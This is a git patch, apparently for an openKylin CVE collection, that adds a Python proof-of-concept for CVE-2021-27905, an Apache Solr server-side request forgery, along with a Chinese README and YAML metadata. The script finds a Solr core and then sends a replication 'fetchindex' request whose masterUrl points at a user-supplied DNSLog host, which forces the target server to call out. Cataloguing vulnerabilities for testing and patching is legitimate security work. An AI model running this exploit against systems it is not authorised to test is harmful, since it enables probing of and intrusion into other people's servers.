From aa3df1d5aa270b65c499200098ae223e62c06bef Mon Sep 17 00:00:00 2001 From: jia <18373490@buaa.edu.cn> Date: Thu, 9 Mar 2023 05:19:48 -0800 Subject: [PATCH] add CVE-2021-27905 --- .../2021/CVE-2021-27905/CVE-2021-27905.py | 81 +++++++++++++++++++ cve/apache/2021/CVE-2021-27905/README.md | 18 +++++ cve/apache/2021/yaml/CVE-2021-27905.yaml | 19 +++++ openkylin_list.yaml | 1 + 4 files changed, 119 insertions(+) create mode 100644 cve/apache/2021/CVE-2021-27905/CVE-2021-27905.py create mode 100644 cve/apache/2021/CVE-2021-27905/README.md create mode 100644 cve/apache/2021/yaml/CVE-2021-27905.yaml diff --git a/cve/apache/2021/CVE-2021-27905/CVE-2021-27905.py b/cve/apache/2021/CVE-2021-27905/CVE-2021-27905.py new file mode 100644 index 00000000..f9bb1129 --- /dev/null +++ b/cve/apache/2021/CVE-2021-27905/CVE-2021-27905.py @@ -0,0 +1,81 @@ +# CVE-2021-27905 +# Apache solr ssrf + +import requests +import urllib3 +import json +import sys, getopt +urllib3.disable_warnings() + + + + +def title(): + print("[-------------------------------------------------------------]") + print("[-------------- Apache Solr SSRF漏洞 ---------------]") + print("[-------- CVE-2021-27905 ----------]") + print("[--------use:python3 CVE-2021-27905.py -u url -d dnslog--------]") + print("[-------- Author:Henry4E36 ------------]") + print("[-------------------------------------------------------------]") + +def commit(): + url = "" + try: + opt, agrs = getopt.getopt(sys.argv[1:], "hu:d:", ["help", "url=","dnslog="]) + for op, value in opt: + if op == "-h" or op == "--help": + print(""" + [-] Apache Solr SSRF漏洞 (CVE-2021-27905) + [-] Options: + -h or --help : 方法说明 + -u or --url : 站点URL地址 + -d or --dnslog : DnsLog + """) + sys.exit(0) + elif op == "-u" or op == "--url=": + url = value + elif op == "-d" or op == "--dnslog=": + dnslog = value + else: + print("[-] 参数有误! eg:>>> python3 CVE-2021-27905.py -u http://127.0.0.1 -d dnslog") + sys.exit() + return url, dnslog + + except Exception as e: + print("[-] 参数有误! eg:>>> python3 CVE-2021-27905.py -u http://127.0.0.1 -d dnslog") + sys.exit(0) + +def target_core(url): + target_url = url + "/solr/admin/cores?indexInfo=false&wt=json" + headers = { + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36" + } + try: + res = requests.get(url=target_url,headers=headers,verify=False,timeout=5) + core = list(json.loads(res.text)["status"])[0] + return core + except Exception as e: + print(f"[!] 目标系统: {url} 出现意外!\n ",e) + +def ssrf(core,dnslog): + target_url = url + f"/solr/{core}/replication/?command=fetchindex&masterUrl=http://{dnslog}" + headers = { + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36" + } + try: + res = requests.get(url=target_url, headers=headers, verify=False, timeout=5) + status = json.loads(res.text)["status"] + if res.status_code == 200 and status == "OK": + print(f"[!] \033[31m目标系统: {url} 可能存在SSRF漏洞,请检查DNSLog响应!\033[0m") + else: + print(f"[0] 目标系统: {url} 不存在SSRF漏洞") + + except Exception as e: + print(f"[!] 目标系统: {url} 出现意外!\n ", e) + + +if __name__ == "__main__": + title() + url ,dnslog = commit() + core = target_core(url) + ssrf(core,dnslog) \ No newline at end of file diff --git a/cve/apache/2021/CVE-2021-27905/README.md b/cve/apache/2021/CVE-2021-27905/README.md new file mode 100644 index 00000000..122f97df --- /dev/null +++ b/cve/apache/2021/CVE-2021-27905/README.md @@ -0,0 +1,18 @@ +# Solr-SSRF +Apache Solr SSRF +#Use +Apache Solr 中的 ReplicationHandler(通常在 Solr 内核下的 “/replication” 注册)有一个 “masterUrl”(也称为 “leaderUrl” 别名)参数,用于指定另一个 Solr 内核上的另一个 ReplicationHandler 将索引数据复制到本地核心中。为了防止SSRF漏洞,Solr应该根据它用于“分片”参数的类似配置检查这些参数。在修复此错误之前,它没有。此问题基本上会影响在8.8.2中修复之前的所有Solr版本。 +[-] Apache Solr SSRF漏洞 (CVE-2021-27905) + +[-] Options: + + -h or --help : 方法说明 + -u or --url : 站点URL地址 + -d or --dnslog : DnsLog + +# eg + +python3 CVE-2021-27905.py -u URL -d dnslog + +# reference +code from: https://github.com/Henry4E36/Solr-SSRF diff --git a/cve/apache/2021/yaml/CVE-2021-27905.yaml b/cve/apache/2021/yaml/CVE-2021-27905.yaml new file mode 100644 index 00000000..d5b9b83f --- /dev/null +++ b/cve/apache/2021/yaml/CVE-2021-27905.yaml @@ -0,0 +1,19 @@ +id: CVE-2021-27905 +source: https://github.com/Henry4E36/Solr-SSRF +info: + name: Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。 + severity: 超危 + description: + Apache Solr 8.8.2之前版本存在代码问题漏洞,攻击者可利用masterUrl参数将索引数据复制到本地内核中。 + scope-of-influence: + Apache Solr < 8.8.2 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-27905 + - https://security.netapp.com/advisory/ntap-20210611-0009/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2021-27905 + cnvd-id: CNNVD-202104-914 + kve-id: None + tags: cve2021,Apache,Solr,SSRF diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 323454b7..10edfee3 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -4,6 +4,7 @@ cve: - CVE-2020-9490 - CVE-2021-41773 - CVE-2021-42013 + - CVE-2021-27905 linux-kernel: - CVE-2021-4204 - CVE-2021-22555 -- Gitee